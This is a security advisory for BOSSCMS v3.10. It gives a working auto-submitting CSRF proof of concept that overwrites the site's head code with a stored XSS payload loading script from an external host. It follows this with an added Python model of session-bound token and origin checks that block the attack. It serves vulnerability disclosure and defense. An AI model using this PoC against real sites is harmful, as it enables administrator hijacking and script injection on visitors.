Exploit Title: BOSSCMS v3.10 - CSRF leading to Stored XSS
Date: 2024-04-01
Exploit Author:
Vendor Homepage: https://gitee.com/Greenpeas/BOSSCMS
Software Link: https://gitee.com/Greenpeas/BOSSCMS/archive/refs/tags/V3.1202310281625.zip
Version: Bosscms v3.10
BOSSCMS XSS reference: https://github.com/ss122-0ss/BOSSCMS/blob/main/readme.md
CSRF
The site code settings handler (admin/?mold=site&part=code&func=add) accepts raw HTML in the name="head_code" and name="foot_code" fields and stores it for rendering in the site's pages, so a script placed in either field is a stored XSS. The payload used here is
<sCRiPt sRC=//uj.ci/szi></sCrIpT>
(payloads of this kind can be generated at https://xssaq.com/).
Because the request can be forged cross-site, the attacker does not need an admin session of their own: host the HTML below (for example at http://127.0.0.1/csrf.html) and get a logged-in administrator to open it. The page's JavaScript submits the form without user interaction, the head_code setting is overwritten, and the payload then executes for visitors of the site. Note that the form replays the csrftoken value captured with Burp; the cross-site submission only succeeds if the application does not bind that token to the administrator's own session.
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <!-- Target: BOSSCMS site-code settings; adjust host and path to the victim install -->
    <form action="http://127.0.0.1/bosscms1/admin/?mold=site&part=code&func=add" method="POST" enctype="multipart/form-data">
      <!-- head_code carries the stored XSS payload; the other code fields are left as captured -->
      <input type="hidden" name="head_code" value="<sCRiPt sRC=//uj.ci/szi></sCrIpT>" />
      <input type="hidden" name="foot_code" value="test" />
      <input type="hidden" name="head_mobile_code" value="" />
      <input type="hidden" name="foot_mobile_code" value="" />
      <!-- csrftoken value replayed from the captured admin request -->
      <input type="hidden" name="csrftoken" value="sk92ef5fq7e14j0lcm" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Hide the PoC URL from the address bar, then submit without user interaction
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
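For comparison, the following is an added example written for this advisory, not BOSSCMS code: a server-side model of the two checks that would stop the PoC above. A token shared across sessions (shown as WEAK_GLOBAL_TOKEN) lets the replayed csrftoken pass; a per-session token compared in constant time, combined with an Origin / Sec-Fetch-Site check, rejects the cross-site submission while the administrator's own submission still works. TRUSTED_ORIGIN, the header names, the Session class and the sample requests are constructed for illustration; the page does not show how the application actually handles its token.

```python
# Added example, not BOSSCMS code: server-side CSRF checks that would reject
# the PoC above.  TRUSTED_ORIGIN, WEAK_GLOBAL_TOKEN, the Session class and the
# sample requests are constructed for illustration.
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict

TRUSTED_ORIGIN = "http://127.0.0.1"       # assumed origin of the admin panel
WEAK_GLOBAL_TOKEN = "sk92ef5fq7e14j0lcm"  # hypothetical: one token for all sessions


@dataclass
class Session:
    """Server-side session carrying its own random CSRF token."""
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


def weak_token_valid(submitted: str) -> bool:
    """Broken design: the token is not tied to the victim's session, so a value
    the attacker observed in their own session replays against anyone."""
    return submitted == WEAK_GLOBAL_TOKEN


def csrf_token_valid(session: Session, submitted: str) -> bool:
    """Correct design: compare against the token of the *victim's* session,
    in constant time.  A token copied from the attacker's capture fails."""
    if not submitted:
        return False
    return hmac.compare_digest(session.csrf_token.encode(), submitted.encode())


def origin_allowed(headers: Dict[str, str]) -> bool:
    """Independent second check.  Browsers add Origin and Sec-Fetch-Site to
    cross-site form POSTs, so the auto-submitted form is recognisable even if
    the token check is missing or broken.  A missing Origin fails closed."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("sec-fetch-site", "same-origin") != "same-origin":
        return False
    return h.get("origin") == TRUSTED_ORIGIN


def accept_code_update(session: Session, headers: Dict[str, str],
                       form: Dict[str, str]) -> bool:
    """Gate for the head_code/foot_code update: both checks must pass."""
    return (csrf_token_valid(session, form.get("csrftoken", ""))
            and origin_allowed(headers))


# Constructed sample traffic.  POC_* is what the HTML above makes the
# administrator's browser send; LEGIT_HEADERS is a submission from the panel.
POC_HEADERS = {"Origin": "http://attacker.example", "Sec-Fetch-Site": "cross-site"}
POC_FORM = {
    "head_code": "<sCRiPt sRC=//uj.ci/szi></sCrIpT>",
    "foot_code": "test",
    "csrftoken": "sk92ef5fq7e14j0lcm",  # replayed from the attacker's capture
}
LEGIT_HEADERS = {"Origin": TRUSTED_ORIGIN, "Sec-Fetch-Site": "same-origin"}


def poc_accepted_by_weak_check() -> bool:
    """Global/static token: the replayed value passes and the CSRF succeeds."""
    return weak_token_valid(POC_FORM["csrftoken"])


def poc_accepted_by_hardened_check() -> bool:
    """Per-session token plus origin check: the PoC request is rejected."""
    victim = Session()
    return accept_code_update(victim, POC_HEADERS, POC_FORM)


def legit_update_accepted() -> bool:
    """The administrator's own submission from the panel still goes through."""
    admin = Session()
    form = dict(POC_FORM, csrftoken=admin.csrf_token)
    return accept_code_update(admin, LEGIT_HEADERS, form)


if __name__ == "__main__":
    print("weak check accepts PoC:", poc_accepted_by_weak_check())
    print("hardened check accepts PoC:", poc_accepted_by_hardened_check())
    print("hardened check accepts admin:", legit_update_accepted())
```

Running the file prints True, False, True in that order: the replayed token is enough against a token that is not bound to the session, and neither check alone is relied on in the hardened path, so the forged form is rejected on both the token and the request's origin.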